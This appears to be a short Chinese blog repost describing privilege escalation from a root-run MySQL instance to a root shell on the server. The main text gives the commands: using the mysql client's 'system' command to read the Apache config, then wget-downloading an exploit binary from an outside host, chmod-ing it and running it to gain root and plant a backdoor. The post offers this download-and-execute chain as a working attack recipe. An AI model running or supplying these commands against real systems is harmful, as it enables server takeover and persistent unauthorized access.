zoukankan      html  css  js  c++  java
  • mysql以ROOT权限提权方法

      今天feng问了一个问题,mysql root权限运行,直接root服务器吧,SSH登录

    正好上网查一下相关的资料:

     
    mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内。

    按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是 按照我的的方法,没有必要再去找web路径了,直接执行

    mysql>system vi /etc/httpd/conf/httpd.conf;

    直接这样就可以找到web的路径,当然,我们的目的并不是找web路径,放webshell进去。我们是要来做其他的事情,比如,下载exp执行, 搞到 root权限,然后装后门虾米的

    mysql>system wget http://www.baidu.org.tw/xxxx ;

    mysql>system chmod +x xxxx;

    mysql>system ./xxxx;

    这样mysql的root此时就成为system的root了,剩下的事情,如果开了ssh,就ssh上去,输入mysql的用户密码,ok,搞定。

    相关资料:

    http://www.linuxidc.com/Linux/2010-12/30787.htm

    http://www.waitalone.cn/mysql-tiquan-summary.html?replytocom=390

  • 相关阅读:
    Extending Markov to Hidden Markov
    Logistic Regression – Geometric Intuition
    【计算机视觉】会议投稿相关推荐
    NP难问题求解综述
    PCA的数学原理
    Brief History of Machine Learning
    图像局部特征点检测算法综述【修正排版】
    thinkphp输出表格
    1503162139-ny-分数拆分
    C++中经常使用到宏
  • 原文地址:https://www.cnblogs.com/sevck/p/5583004.html
Copyright © 2011-2022 走看看